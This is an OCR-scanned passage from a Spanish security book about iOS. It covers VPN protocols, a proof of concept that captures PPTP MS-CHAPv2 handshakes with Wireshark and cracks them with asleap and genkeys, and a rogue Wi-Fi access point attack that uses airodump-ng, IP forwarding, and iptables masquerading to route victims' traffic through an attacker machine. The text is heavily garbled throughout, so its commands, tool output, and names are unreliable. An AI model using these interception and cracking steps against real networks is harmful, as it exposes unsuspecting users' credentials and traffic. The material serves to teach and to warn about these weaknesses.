el  valor  0,  es  equivalente  a  indicar  un  vnhsT  infinito. 


4.VPN  en  iOS 

T.as  conexiones  VPN,  son  Redes  Privadas  Vlriuales  para  rjisponer  de  una  conexión  segura,  en  un 
medio  o  entorno  inseguro,  como  puede  ser  Internet  o  ima  red  pública  o  abierta  er]  un  acTopuerLo  o 
cafetería. 

r.os  usuarios  de  fOS^  en  mnclias  ocasiones  buscan  redes  Wi-Fi^  ya  sea  porque  su  tarifa  de  datos  se 
agota,  o  bien  por  necesidad  de  descargar  ficheros  que  no  se  puedan  descargar  por  3G,  y  eso  les  lleva  a 
veces  a  coneclaoie  a  redes  abiertas  o  sin  protección.  Algunos  de  estos  usuarios,  los  más  preocupados 
por  la  segtrridad,  han  buscado  alguna  manera  de  proLcgcrse,  y  han  descubierto  la  existencia  de 
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cünü.5dones  VPN  como  Ibnna  de  navegación  segura.  Además  también  hay  usuarios  que  se  conectan 
con  sus  máquinas  domésticas  desde  fuera  de  casa,  o  incluso  con  servidores  de  la  coinpaiiía  para  la 
que  trabajan,  desde  ftjera  de  esta.  Pn  estos  casos  son  típicas  las  VPNs  On-Demmíd. 

Tai  y  como  lo  presenta  la  propia  Apple  en  su  doeuniciilación,  (la  cual  se  han  encargado  de  tTadiicir  a 
varios  idiomas,  por  aquello  de  incrementar  los  índices  de  penetnioiÓTi  de  /OS  a  nivel  coiporativo),  la 
experiencia  de  V1*N  al  coticclutsc  a  redes  corporativas  es  excelente,  gracias  a  tecnologías  estándar 
corno  lPv6,  servidores  prox\^,  tundes  divididos,  cLcéíera,  además  de  pemntir  diversos  métodos 
de  autenticación  como  el  tiso  de  contraseñas,  tokens  de  doble  factor  y  ceitifícíidos  digitales.  A 
continuación  se  describen  ct>n  más  detalle  los  protocolos  y  métodos  de  autenticación  disponibles; 

-  VPN  sobre  SSL:  Es  configurablc  con  autenticación  de  usuario  por  contraseña,  token  de 
doble  factor  y  ccrtincudris.  /í9S  pennite  acceder  a  servidores  VPN  sobre  SSL  de  la  serie  ¿yí 
de  Jumpef\ASA  de  Cisco  y  Bíg-IP  F.dge  Gcüeway  de  F5^  con  tas  respectivas  apps  de  la  App 
Store  de  Cisco,  Jmiper  o  F5  NePvorks. 

-  IPSec  de  Cisco:  Es  compatible  con  la  autenticación  de  usuario  por  contraseña,  tqken  de 
doble  factor,  autenticación  aiUaiu ática  mediante  secreto  companido  y  certiñeadns. 

-  L2TP  sobre  IPSec:  Autenticación  de  usuario  por  contraseña,  token  de  doble  factor, 

autenticación  a  uto  máticaí  Hedíante  secreto  compartido  Y  certificados  digitales, 

“  PPIT':  Admite  autenticación  mediante  contraseña  MS-CIlAPv2  y  token  de  doble  factor. 

Para  las  conexiones  en  entomos  empresariales  que  rcquieiaii  de  doble  tactor,  iOS  se  integra  con 
liÁS  SecvríD  y  CRYFTOCard.  Además,  para  las  conexiones  que  empleen  autenticación  basada  en 
cemíicados  iOS  VPN  bajo  demanda  o  lo  que  se  conoce  como  KAV  On  Demand,  permiie  establecer 
conexiones  automáticamente,  lo  que  hace  que  los  usuarios  puedan  conectarse  a  redes  VPN  fácilmente. 
La  imagen  10.24  muestra  una  captura  en  la  que  se  aprecian  las  direrentes  opciones  de  configuración 
de  conexiones  VTN.  en  la  Utilidad  de  Coniiguracíón  de  ¡Phone  o  iPCh: 

Pero,  ¿Qué  seguridad  ofrecen  las  VPNs?  Eii  los  sistcjuas  tradicionales  que  han  soportado  los 
escenarios  Miemsoft  para  chciites  VPN,  el  encap  su  I  amiento  se  realizaba  a  través  del  protocolo  de 
capa  2,  Foínt  to  Point  Fratocol  (PPP).  La  realización  del  túnel  se  realizaba  mediante  los  protocolos 
PoM  to  Point  Tímneling  Pmtocol  (PPTP,  propietario  de  Microsoft)  o  Layer  2  Timneling  Protocof 
(L2TP,  estándar  ÍETF).  Ni  PPTP  ni  L2TP  describen  mecanismds  de  cifrado  o  autenticación  dejando 
esta  tarea  al  protocolo  PPP. 

De  cara  a  la  autenticación,  PPP  depende  de  los  protocolos  de  autenticación  implementnbles.  Para 
escenarios  Mícir/soft  los  mecanismos  admitidos  son:  PAP,  Í^PAP,  CH.AP,  MS-CHÁP/MS-CHAPv2 
y  EAP-TLS.  Excepto  para  el  último,  que  implica  una  solución  con  infices  truc  tura  PKI,  existen 
ataques  conocidos  que  peniiiten  recuperar  una  autenticación  de  usuario  y  contraseña,  mediante  la 
imp  tementa c  i  ón  ú c  di  fcreules  ataque s . 

L2TP,  inicialmente,  no  ofrece  mejoras  ostensibles  con  respecto  a  PPTP,  por  lo  que  no  aportaba 
ninguna  solución  adicional  de  seguridad  que  las  planteadas  ya  inícialmente.  La  gran  diferencia  entre 
PP  fP  y  L2TP  OH  que  el  primero,  utiliza  como  protocolo  de  enrutado  a  GRE  mientras  que  el  segundo 
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utiliza  ÍP,  Es  decir,  si  hay  una  conexión  PPTP  o  L2TP/IP  no  54c  autentica  a  nivel  de  máquina,  por 
lo  que  el  Lráñco  podría  ser  manipulado  con  aiiiqucs  MÍTTvI  haciendo  que  pasara  por  rrmquinas  de 
atacantes.  Este  escenario  deja  toda  la  segundad  de  la  canexión  en  manos  de  la  robustez  del  cifrado 
a  nivel  PPPy  de  la  forLalc/a  del  sistema  de  auteiiticacióm 

Conscienle  de  csLc  hecho,  Microsqfit  decidió  en  su  momento  utilizar  L2 TP  en  su  variariLc  cí]n  ¡Psec, 
que  garantizaba  iina  mayor  seguridad  mediante  encapsulaniiento,  cifiado  y  PErmado  en  capa  3,  El 
liso  de  IFsec^  (no  en  sn  variante  Pre-Shared  Key),  para  aiiLcnLicar  las  máquinas  de  la  coiiexióm 
impediría  la  manipulación  del  trático  por  medio  de  técnicas  de  Man  In  The  2VíkMe,  dificultando 
cualquier  posible  ataque.  Sin  embargo,  c1  protocolo  PFíP  deposita  la  seguridad  en  PPP,  que  será 
el  encargado  de  garantizar  el  proceso  de  autentiílcación  y  cifrado,  dicha  autenticación  no  se  hace  a 
nivel  de  máquina. 

VPÑ  ^ 

Nombra  la  contaión 

fticmhrF  vi^ibEg  de  la  can&jtNSn  fse  tr  ti  dispos i Itvo) 

Ihequlred;  '  ''  Q 

Tipo  de  concjcidn 

F1  tipo  da  conexión  permitida  ppi'  eitd  |?üííticd 


FFi-p 

IP^pr  (CÍSíOl 
Qjco  AnvConngct 
SSL  dejumper 
FíSSL 

SordtíWALL  MobllE  Coníiect 
Ai  uba  VIA 

rwrsotiaíJMdo 


AuranrKaoándE  utuftriü 

Tipo  de  autenbcjtcLÓn  pora  Ea  oonexíón 

0  Cd  ntraseña  Q  A  Sem  rIO 

Sfcrem  compartida 

Sí  indo  cPTíi  partido  para  fa  cpriexíún 

[[opiíon^I  ~  j 

Q  Enviar  roda  «j  rráfícn 

Dirige  todn  r(  rr^ficc  de  red  a  travéj  ^  conexión  VPN 
CPnfigu  rucie  n  da  prgxy 

Corrñgura  loa  proxies  qyt  se  Lujrán  uur  esta  cc  7DJdiSn  VPN 
[  Nln^na  T]  ~ 

Imagen  10,24;  Opciones  de  cortñgiLraciér,  <ie  VPN  en  la  UíUidadde  Co^figidraciÓN  de  iPhorti^. 


Conexiones  PPTP 

rj)  conexión  PPTP  es  susceptible  a  un  ataque  de  Man  in  the  Middle  (NTTTM),  lo  que  implicaría 
el  posible  robo  del  inlcrcambio  de  infoniiación  de  autenticación  que  tupiera  lugar  al  inicio  de  la 
conexión  VPN.  Puesto  que  PPP  no  oñece  ninguna  garantía  de  cifrado  al  proceso  de  iiegociaeiiín  rie 
la  autenticación,  la  seguridad  recae  sobre  el  mecanismo  de  autenticación  elegido. 


^ _  10 

i"  la  oc  f  Bíáón 
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Los  sií^temas  CHAP^,  PAP,  SPAP  cuentan-  desde  hace  tiempo,  con  vulnerabilidades  conocidas 
que  pemiiten  su  explotación  y  solo  deben  implenrentaise  en  entornos  'legacy”  como  solución  de 
compatibilidad  y,  por  supuesto^  turnando  medidas  de  protección  añadidas- 

En  el  caso  de  sistemas  MS-CHAPv2,  Bmce  Schneier,  Mudge  Detvid  l+hfgner  publicaron  en  1999 
un  paper  llamado  ‘^Cfypfatialysis  qf  MicrosqfPs  PPTP  Aiaheríticaíhn  Exíem'Iom  {MS-CHAPv2p^ 
en  el  que  se  explican  las  debilidades  de  las  irnplcTiienlacioncs  MS-CHAPvl  y  MS-CHAPv2.  Este 
trabajo  fue  conlinuado  por  Jochen  Eísinger  que  publicó  en  2010  '^Exploirmg  knoM-n  secan  hoies  in 
Microsoft s  PPI'P  Aufkentication  Extensíons  (MS-CHAPvJ)''  en  el  que  Sé  describe  el  algoritmo  que 
hay  que  impleinentar  para  realizar  una  ataque  con  éxito  a  un  proceso  de  auLenticación  MS-CH  AFv2 
niediante  una  explotación  offiine.  Es  decir,  una  vez  grabada  la  sesión. 


MSCHAPv2 

MS-CH. APv2  proporciona  autcnLieación  mutua  e<iTi  la  generación  de  claves  de  cifrado  de  datos 
iniciales  más  seguras  para  el  Cifrado  punto  a  punto  de  Microsojt  (MPPH)  y  diferentes  claves  de 
cifrado  para  los  datos  enviados  y  los  datos  recibidos.  La  autenticación  se  basa  en  el  método  desafia- 
respuesta: 

1.  Ei  cliente  solicita  un  desafío  deí  servidor. 

2-  El  servidor  devuelve  un  desafío  aleatorio  de  16  bytes. 

3.  El  cliente  genera  un  número  de  16  bytes  aleatorio  denominado  "Peer  Aaihetiücaíor 
ChallengE', 

4.  El  diente  genera  una  clave  de  8  partiendo  del  desafío  recibido  previamente  del  servddoi; 
el  generado  por  el  equipo  cliente  y  la  cuenta  de  usuario. 

5.  La  respuesta  de  24  bytes,  es  generada  utilizando  la  función  dcl  hask  NT  de  Whulows  y  la  clave 
generada  en  el  paso  4. 

ó.  El  serv'idor  utiliza  el  hash  de  la  contraseña  del  usuario  almacenada  en  la  base  de  datos  para 
descifrar  !a  respuesta.  Si  el  bloque  descifrado  coincide  con  el  desafío,  el  cliente  es  auLenticaílo. 

7.  El  servidor  utiliza  la  clave  de  16  hyies  dcl  el  ¡ente  y  el  hash  de  la  contraseña  para  crear  ima 

respuesta  del  autenlicador  de  20  énnes.  ' 

8,  El  ciiente  procesa  una  respuesta  del  autenticador.  Si  la  respuesta  procesada  coincide  con  la 
respuesta  recibida,  el  servidor  es  autenticado- 

Puesto  que  PPP  no  aporta  im  sistema  de  cifrado  adicional  al  proceso  de  negociación  de  la 
autenticación,  este  procedimiento  del  intercambio  de  claves  puede  ser  interceptado  niediante  una 
ataque  MITM  para  realizar  un  a  laque  ojfime  a  posteriori. 
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Una  contraseña  corta  y  débil  podrá  ser  obtenida  con  mayor  eftcacia  que  una  contraseña  más  lar^a  y 
compleja.  B1  mejor  algoritmo  basado  exclusivameiite  en  nsuai  io  y  ooTiimsefla  o  M5i-CHAPv2,  pero 
incluso  este  es  susceptible  a  un  ataque  basado  en  diccionario. 

Una  vez  presentada  la  teoría  sobre  conexiones  VPN,  es  el  momento  de  ver  dónde  entran  en  juego 
varios  ataques  conocidos  sobre  los  protocolos  utilizados  para  crear  WNa,  que  pueden  ser  LiLilizatlos 
para  hachear  las  cümunicacit)nes  y  obtener  crcdeneialcs. 


PoC:  Crackeo  de  VPN  en  iOS  con  PPTP  y  MSCHAP\2 

A  continuación  se  va  a  crear  tina  nueva  conexiÓJi  por  WN  a  un  servidor  corfioralivo,  uiilizaiitlo  el 
protocolo  PPTP  con  autcnLicación  por  contraseña  MS-CHA?  v2.  El  dispositivo  iOS  se  encuentra 
conectado  a  un  punto  de  acceso  abierto,  pero  también  podría  realizarse  un  proceso  similar  a  este  si 
se  encontrase  en  una  red  Wlreiess  con  clave  conocida- 


Si  el  dispositivo  IOS  se  conecla  al  pnnLí^  }fi-Fi  y  uLiliza  la  conexión  VTN  mencionada  (aparecerá  uu 
icíino  VPN  en  la  barra  de  estado  del  dispositivo  ¿Oó),  utilizando  Wireshark  con  la  tarjeta  en  modo 
monitor,  se  puede  capturar  todo  el  tráfico  y  filtrarlo  acorde  al  ataque. 


En  este  caso,  se  puede  buscar  CHAP  entre  los  paquetes  enviados/recibidos,  do  manera  que  se  puede 
capiuraj  la  negociación,  cutre  cliente  y  servidor  tal  y  como  se  aprecia  en  la  siguiente  imagen. 


protDCBt  VersiíiR  4.  Sre:  Bfl. 14&  {8^.31. 196.148).  m. 160.8.263  (192  ñ 
£1  Genfiflc  flciaifíg  Encaps  ulstLqn  tPPPJ 
H  Pal(i  t"ta-Pííií3t  ^idLdcuI 

-]  PPP  ifcinife  A«thrntlC3tljCHi  ProEívtroL 

codBi  challenge  (1} 
identififir;  e 
Length;  29 

^  CciL.cE 

Ut-Iieeí  Sítcí  16 


&&ie  e6  21  t6  2d  33  41  76  3b 
9a29  6S  es  45  68  66  4^  an  cb 
3930  6a  2A  ca  as  S6  cb  30  61 
994B  66  g3  SB  B9  66  fl3  c2  23 
3350 

SS60  44  53  43  4L 


"gí  bf  /B 
BB  86  «4  da  03  80  80  93 

3a  ne  76  7f  bd  b8  bi 

5B  0b  66  11  36  23  63 

68  66  Id  13  j 

48  41  52 


.  .  .  -3Afj; 

. .L. .L. , 

j . 6, 

.# 


364  S 
3685:27.898626 


' .  VALUL^«sli504;fe7fl}7e41Z27eff  Ii6e&40a9ece3e 
5=?  FD87FQ9CAÍ>5A3Aia7i4A4A583I4S47  5  51052063  ■ ) 


Imagen  10.25:  Capturando  tráfico  CllAP. 
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Fn  \a  imagen  ímLcríor,  se  aprecia  el  challenge  y  respome,  necesarios  para  realizar  un  ataque  por 
diccioiiario  con  la  conocida  herramienta  asieap  (disptinihle  pí>r  cjeriipUí  en  BackTrack),  para 
intentar  extraer  las  credenciales,  y  un  diccionario  que  se  crea  previamente  utilizando  una  utilidad 
que  iiicorpuRi  cLsIecip,  llamada  genkeys,  tal  y  como  se  aprecia  en  la  siguiente  captura. 


-i  hftih.kcy  -n  -ñ  54:7S:rD:4a:3e:M:9£: 

2^2  -  activel;/  recoven  LEAP/IOTP  p^s^stnrds^  ^JvrlgKt^aibor^.coB^ 
hsEh  bytes;  #¿34 

HT  héEti; 

pastwsrd:  adftin  - 

rootfbt rotes  1/01  Uep#  | 


Imagen  10.2íí:  Generación  del  fichero  de  hash  y  de  índices  con  ge^keys. 


75:lc:eb:75:3e:30:b4  -R  Hfí:ri7:f?S : fif  r^t :fi7 :56 :41:e4:9E! : 37:&3 :93 :ab ; 

-f  hash.key  -n  índex. key 

cover  LEAP/PPTP  pESSwards.  <jwríght§hasborg.cocn> 

947d 

4dl  c89 1 9f  1  abe  f  fe  ida  38434  f  e4Sb9  4  ?d  , 

n  scylla_ZBI2  f]  fl _ □ _ ¿_ 

Tinagen  10.27:  Askap  devolviendo  las-  credenciales. 

Un  el  caso  de  esta  prueba  de  concepto,  ía  contraseña  se  cncímlraba  en  el  diccionario»  por  lo  que  se 
extrae  sin  problemas»  y  sin  tardar  mucho  tiempo»  tal  y  como  se  comprueba  en  la  captura  anterior. 
Pero  evidentemente  el  éxito  de  este  ataque,  depende  de  la  cantidad  de  palabras  contenidas  en  el 
diccionario  con  el  que  se  prepara  el  ataque»  por  lo  que,  en  caso  de  que  la  contraseña  sea  robusta  o 
tenga  eieiLo  grado  de  complejidad»  el  alaque  requeriría  inuclio  tiempo  o  una  elevada  capacidad  de 
cómputo. 


fLíOjrbt:*^  asieap  -C  ec; 
ff:£f9:?d:b8ifS:SSíf7:i:fi 
ssleap  2.2  '  actívfily  re 
Nash  bytest 
NT  hash: 
pas Eword: 
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l.Rogue  AP:  Puntos  de  acceso  Wi-Fi  falsos 

r,a  tmdiiccíón  literal  de  Rogut  AP  es  '"Punto  de  acceso  picaro”,  y  aunque  no  es  una  tradncción 
desaceitada,  resulta  confíjs^.  En  im  ámbito  más  descriptivo,  se  define  Rogue  ÁP  como  un  punto 
de  aeeesí]  Mmless  con  intención  de  captniar  y/u  uiodificar  el  tráfico  generado  por  los  clieuLus 
conectados.  Lo  que  comúnmente  se  conoce  como  Man  in  the  middie  ÍMITM)* 

Para  que  un  ataque  de  este  tipo  tenga  éxito,  hay  que  detemiinar  una  serie  de  factores,  como  por  ejemplo 
el  tipo  de  cliente  al  que  va  dirigido  el  ataque  o  si  el  AP  va  a  suplantar  a  uno  lícito  ya  existente.  En  el 
caso  de  ataques  no  dirigidos,  orientados  a  víctimas  confiadas  y  con  pocos  Gonocimicutíjs  técnicos, 
será  suficiente  con  configurar  un  AP  sin  ningiin  tipo  de  cití  ado  ni  antcnticación.  En  cambio,  paia 
realizar  una  suplan lación  en  una  red  concreta^  es  necesario  conocer  con  todo  detalle  la  configuración 
de  los  puntos  de  acceso  de  la  red  a  suplantar. 

Por  lo  general  la  usabilidad  es  inversamente  proporcional  a  la  seguiidad,  y  es  de  esto  de  lo  que  se 
valen  los  atacantes.  Se  busca  que  cualquier  usuario  final,  sin  grandes  conocimientos  en  la  materia 
en  cuestión,  pueda  configurar  y  mmiejar  de  manera  rápida,  cómoda  y  sencilla,  cualquier  elemento 
sofm^are  o  hardware.  Hay  muchos  ejemplos  de  esto,  se  puede  hablar  de  la  remología  WP^  (M- 
F¡  Pmíectíid  ScUíp)  que  ofrece  al  usuario  una  conexión  instantánea  desde  su  dispositivo  al  punto 
de  acceso,  con  una  simple  pulsación  de  botón  (ñsico)  en  el  punto  de  acceso  o  a  través  de  un  pin 
numérico  de  cuatro  dígitos,  quedando  configurada  su  conexión  Wi-Fi  sin  necesidad  de  introducir  la 
clave  de  la  red.  Dicho  ds  otra  forma,  se  procede  al  Iraspíusu  de  credenciales  desde  e]  punto  de  acceso 
al  dispositivo  cliente,  con  una  pulsación  de  botón,  o  con  un  pin  numérico.  No  imp<irta  si  la  clave 
generada  es  mayor  de  los  2  í  caracteres,  si  estos  son  alfanumérícos,  mayúsculas  y  minúsculas*  y 
caracteres  especiales,  introduciendo  uii  pin  de  cuatro  dígitos,  el  dispositivo  queda  asociado. 

Pero  la  característica  más  imporLantc  de  la  que  aprovecharse  en  un  ataque  de  suplan tación  de  punto 
de  acceso  es  el  conocido  Comcraraidomáticameníe.  Cuando  uii  clicnic  se  conecta  por  primera  veza 
una  red,  o  la  configura  manual  mente,  es  habitual  y  cómodo  utilizar  la  fitnción  de  conexión  automática, 
asi  la  próxima  vez  que  entre  en  el  alcance  de  la  red,  el  dispositivo  automáticamente  se  conectará. 
El  problema  surge  cuaridu,  en  una  red  con  múltiples  puntos  de  accest),  el  dispositivo  se  conecta  al 
puuLo  de  acceso  que  le  ofirece  mayor  potencia  (generalrrícntc  el  más  cercano),  y  es  en  lo  que  se  basa 
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una  buena  suplantación  dcí  punto  de  acceso.  Fs  decir,  si  el  p  luí  Lo  de  acceso  suplíuiLado  ofrece  Jiiayor 
potencia  que  el  punto  de  acceso  onginal,  los  clientes  con  la  ñinción  Conectar  automáticamente 
habililada  se  coaectaiaii  al  punto  de  acceso  suplantado  sin  ni  siquiera  hacer  clic.  No  solo  eso  sino 
que  además  con  Ins  bcTTEimicutas  estándar  de  conexitm  Wi^Fi.  no  aparecerá  una  red  por  cada  AP. 
sino  que  solo  aparecerá  una,  y  será  el  propio  sistema  operativo  quien  decida  a  que  ÁP  conectarse, 
basándose  en  la  potencia  de  señal  recibida  de  cada  punto  de  acceso,  incluyendo  al  AP  suplantado. 


Fxisten  diferentes  dispositivos  con  los  que  realizar  un  Rogue  /ÍP,  pudieiido  utilizar  un  Punto  de 
Acceso  como  tal,  un  romer  "de  casa’'  o  incluso  una  taijeta  Wi-FU  externa  o  integrada*  Hay  que 
recordar  que  un  punto  de  acceso  ínalánibiico  propiamente  dicho  tiene  la  única  función  de  convertir 
la  señal  cableada  en  ondas,  y  gencralmenLe  iiieorporan  un  servidor  DHCPpara  ofrecer  direcciones  IP 
a  los  clientes,  Fs  decir,  no  hace  la  función  de  un  ronterm  de  un^-w/rc/?.  El  utilizado 

por  Lodos  para  conectarse  a  Internet  es  a  su  vez  punto  de  acceso  inalámbrico,  eimitador  entre  redes, 
y  módem  WAN  para  la  salida  a  Internet,  Al  igual  que  un  punto  de  acceso  iiialárribricü,  dispone  de 
servidor  DHCP  para  asignar  iPs  automáticamente  a  los  clientes  conectados*  En  si  caso  de  una  tarjeta 
Wi-Fi  cliente  e&lándai  se  necesita  de  alguna  utilidad  paia  utilizarla  como  punto  de  acceso^  y  sofnvam 
especifico  en  la  máquina  para  crear  un  servidor  DHCP. 

El  ataque  consiste  en  que  las  víctimas  se  conecten  a  un  punto  de  acceso  que  consideran  de  conriaiiza 
(ya  sea  conectándose  automática  o  manualmente),  y  una  vez  conectadas  ver  el  tráñeo  que  generan. 
Para  ello  es  necesario  disponer  de  una  máquina  controlada  por  el  atacante,  donde  llegarán  las 
peticiones  de  las  víctimas.  Para  conseguir  esto  es  necesario  configurar  un  servidor  DHCP  (como  ya 
se  ha  mencionado,  los  puntos  de  acceso  y  los  nmíer  lo  tienen  integrado)  para  establecer  que  la  puerta 
de  enlace  de  la  conexión  sea  ei  equipo  preparado  por  el  atacante.  Para  eompleUir  d  ataque  y  hacerlo 
tiTuispareiite,  ia  máquina  atacante  lia  de  enrutar  el  tráfico  entre  la  víctima  e  internet. 


Aunque  es  cierto  que  no  se  pueden  coiisiderai  vulnerabilidades,  iOS  presenta  una  serie  de  debilidades 
que  le  baeen  propicio  a  ser  víctima  en  la  HuplaTilacióri  de  j] untos  de  acceso  Wí-Fi. 

-  Conexión  a  redes  conocidas:  En  ajustes  dd  sistema  se  presenta  nn  selector  de  título 
Preguntar  al  conecta^',  que  la  mayoría  de  usuarios  interpreta  como  una  opción  para 
conectarse  automáticamente  a  redes  ctmocidas,  o  no  hacerlo.  Es  Lo  no  es  cierto,  como  se  puede 
comprobar  al  leer  la  letra  pequeña  de  esta  opción.  En  cualquiera  de  los  casos,  el  dispositivo 
se  conectaiú  a  él  automáticamente  sí  encuentra  una  red  conocida,  mientras  que  aparecerá  un 
mensaje  con  las  redes  disponibles  para  su  conexión  si  se  activa  el  selector,  o  se  deberá  ir  al 
panel  de  configuración  Wi-Fi  y  conectarse  manualmente  en  caso  de  desactivar  esta  opción* 


j  Preguntar  al  conectar  O  ") 

i,  .  ^ 

Se  accedí  automátíesmente  a  ias  redes  . 

conocidas.  Si  no  har/  ninguna  red  ' 

cpnEpcida  cíí&poíiíbfe,  d:éb^  s^fsecjonar  ¡ 
una  rpípualiTierú^  i 


Preguntar  al  conectar 


Se  accederá  automáácarrtónte  a  las  i^ades 
conocidas.  Si  09  hoy  niitq Lina  dt&pontbíe, 
se  fe  preguntará  antes  de  acceder  a  una 
réd  nueva. 


¡tnaí^en  1  LOE  Redes  eonoddas. 
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-  Lista  de  redes  coüociday:  Los  dispositivos  iOS  guardan  aquellas  redes  a  ías  que  los 
usual  ios  tiene  cousideratks  como  de  confianza,  es  decir,  aquellas  a  las  que  se  marea  *'eoneetar 
aLiLíJTTiáticaTnente'\  Ll  problema  surge  cuando  se  quiere  eliminar  un  perfil  Wi-Fi.  ya  que 
iOS  no  muestra  en  ningún  caso  ías  redes  ctjnoeidas^  y  solo  será  posible  eliminarlas  cuando 
el  dispositivo  se  encuentre  en  el  alcance  de  la  red.  En  caso  de  disponer  de  un  dispositivo 
desbloqueado,  se  pueden  gestionar  los  perfiles  Wí-Fí  almacenados  accediendo  al  fidiero  base 
de  datos  llamado  keychaín-2.db. 

-  Política  de  elección  de  red:  En  el  caso  de  encontrar  múltiples  redes  conocidas  al  alcance 
de  i  dispositivo,  este  establecerá  el  orden  basándose  en  la  última  red  a  la  que  se  baya  conectado. 
Lrilizará  un  sistema  LIFO  basándose  en  la  Liltírria  fecha  de  conexión. 

-  Reconociiiiiento  de  redes:  El  mayor  problema  en  cuanto  a  redes  conocidas  reside  en  que 
los  dispositivos  iOS  reconocen  las  redes  a  las  que  lia  estado  conectado  únicamente  por  su 
SSID  (el  nombre  de  la  red)  y  su  seguridad,  es  decir,  cifrado  y  pQSSWord.  Es  de  esto  de  lo  que 
se  bcíierieiará  un  atacante  para  suplantar  las  redes  conocidas, 

-  Información  minimalista:  En  la  infoiinacióii  que  se  muestra  a  los  usuarios  sobre  una  red 
Wl-Fi  en  iOS.  no  se  diferencia  etnre  si  es  una  red  de  infraestructura  o  ad-hoc,  lo  que  permite 
engañar  mas  fácilmente  a  los  usuarios. 

Pero  que  desde  el  propio  dispositivo  no  se  puedan  ver  las  mdes  M-Ft  conocidas  que  no  se  encuentren 
ú  alcance,  no  significa  que  un  atacante  no  pueda  haeerku  De  hecho  es  suficiente  con  capturar 
paquetes  “en  el  aire"  para  descubrir  a  que  redes  intenta  conectarse.  Se  puede  hacer  uso  de  la  suite 
üircrack-ng,  (xmeretamente  airodump-ng  para  monitorizar  todas  las  redes  disponibles,  los  clientes, 
y  el  nombre  de  aquellas  que  el  dispositivo  está  buseando  para  conectarse  automáticamente.  Es  tan 
sencillo  como  ejecutar  la  aplicación  y  fijarse  en  el  campo  Probe,  donde  irán  apareciendo  los  SSID 
separados  por  eotnas. 
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2.  Preparando  el  entorno  Linux 

Ctírno  se  ha  dicho  auteriormeme,  el  equipo  atacante  ha  de  realizar  la  función  de  rouíer  u.í\\Í7.^uáa  dos 
interfaces  de  red,  una  para  comunicarse  con  el  AP  suplan Lad<í,  y  la  otra  con  salida  a  Internet  Estas 
dos  iiitertaces  pueden  ser  cableadaK,  Wíreless,  o  incluso  una  combinación  de  ambas. 
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Pam  este  ejemplo,  se  iitiliz-ará  una  interfaz  cahleadn,  de  nombre  ethO  cunee Lada  al  punto  de  acceso 
utilizado  para  la  supíantación,  y  una  mteríaz  Wirdess  de  nombre  wlartO  conectada  a  ima  red  Wi-Fi 
de  confian/a  con  salida  a  ItilcrricL  Para  que  el  equipo  atacante  haga  la  ñmción  de  router^  se  tiene 
que  cumplir  que  las  interfaces  tienen  que  estar  eonnguradíis  coTriu  subredes  independieiités,  y  que 
el  enrutaiiiíento  tenga  sentido.  Existen  vanos  métodos  para  habilitar  esta  ñmción,  unos  temporales 
(hasta  que  el  equipo  se  reiincie)  y  otros  permanentes.  El  modo  temporal  se  habilita  modificando  el 
hchero  ip  jbn^^ard  que  se  encuentra  en  el  directorio  /prüc/sys/fiet/ipv4,  eslablecieudo  el  contenido 
de  dicho  fichero  al  valor  1.  La  modificación  es  posible  realizarla  con  cualquier  editor  de  texto,  o 
mediante  el  comando  echo  con  la  salida  redirigida  al  fichero  citado:  echo  I  >  /pmc/sys/ne:/ipv4/ 
¡p^fonvmd 


Ijuítgeji  i  1.03:  CojbíiülÍo  echo  red  i  rígido  al  íichern  ip^fonvwd. 


Otia  manera  de  habilitar  la  función  de  routing  temporal  es  mediante  el  comando  sysclL  con  la 
si  g  ni  en  te  i  n  s  Lr  LL  cc  ióii;  sysctl  -iv  noL  ¿p  ip_/b  r  Wi:ini=  I 


Fífe  Éeit  Vlew  Bockiiaib.  Síítíing^  Help 
roCTtíaubÍLi  rttL ;  /  hoffie/íM#  sy s  ct  l  -w  n&t .  Ipv4 .  lp_f a  rva  rd=l 
net.ipv'4.ip“Cfrwartl  =  1 


m 


m 


Imtigea  l  LK;  Syvei!  de  configurar  i  en  para 


En  el  caso  de  necesitar  que  la  modificación  sea  permanente,  se  modifica  el  fichero  /pJr/sysctLconf 
y  se  csLablccc  el  valor  /  a  la  áiTccú'v^  neL¿pv4.  íp  forward,  O  se  añade  la  línea  si  no  existe.  Una  vez 
modificado  y  guardado,  se  recarga  este  fichero  mediante  el  comando  ^ysc¿I  -p  /e!c/:íyscii.conf 


imagen  1L05:  Ficíitíriü  i;yscf¡.coní 

Fs  necesario  cuín  ase  arar  lodo  el  tráfico  de  la  interfaz  cableada  para  enviarla  por  la  interfaz 
inalámbrica,  dado  que  pertenece  a  otra  subretl.  En  caso  coiilrario,  el  router  que  se  encueniTe  tras 
la  ['ed  Wi-Fi  descartará  los  paquetes^  dado  que  no  reconoce  la  dirección  fP  de  origen.  Mediante  el 
comando  iptohle.^  se  realiza  el  MASQUERADE  a  la  mit  de  la  interfaz  wíanO  del  equipo. 


•Fi¡,«  EjíÍ-:  Vfiw  Selíán^  Help  .... 

|•[^[^lflL[i>Jr.lL;/llH3^''iJe4if  IptdtíltíB  -t  nart  -A  PÓítRwtlWi  -a  wlsn0  - 

]  MASQUtHAUb  g 

Imagen  11. Ü6:  Comundü  pn  ^  ciimi  qcíírar  el  tráften. 
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3.  Configurando  el  punto  de  acceso 

Como  ya  se  ha  mencionado,  lo  impoitaiilc  en  una  suplan Lac ion  de  este  Tipo  es  conocer  toda  la 
inforiimción  posible  de  k  red  que  se  va  a  suplantar,  para  configurar  el  AP  con  los  datos  obLenidus. 
Aunque  existen  miiltiples  maneras  de  configurar  un  AP  (teJncL  puerLo  do  serie  en  dispositivos 
antiguos,  etcétem),  laiimnera  más  rápida  y  soneilla  os  a  través  del  cliente  web  Hay  que  destacar  que 
lio  todos  los  /¡rmwüres  de  los  puntos  de  acoeso  y  rouíers  pemiiteii  una  configuración  válida  para  el 
ataque  que  so  quiere  realizar,  por  motivos  que  se  verán  más  adelante. 

Cuanta  mayor  información  se  tiene,  más  víctimas  potenciales  hay.  Hn  ol  caso  de  querer  aprovecharse 
de  la  inocencia  de  la  víctima,  y  croar  una  rod  abierta  sin  cifrado  ni  autenticación,  la  configuración 
que  se  cslableoo  on  ol  punto  de  acceso  pierde  importancia.  Únicamente  hay  que  tener  en  oucnla  que 
la  puerta  de  enlace  que  proporciona  el  DHCP  sea  la  máquina  atacante  por  la  que  pasará  el  tráfico, 
independientemente  del  nombre  do  la  red  que  se  configure  en  el  AP  y  el  rango  de  dilecciones  a 
utilizar. 

Al  oontrano  que  ocurre  con  la  configuración  anterior,  es  esencial  tanto  ol  nombre  de  la  red,  como 
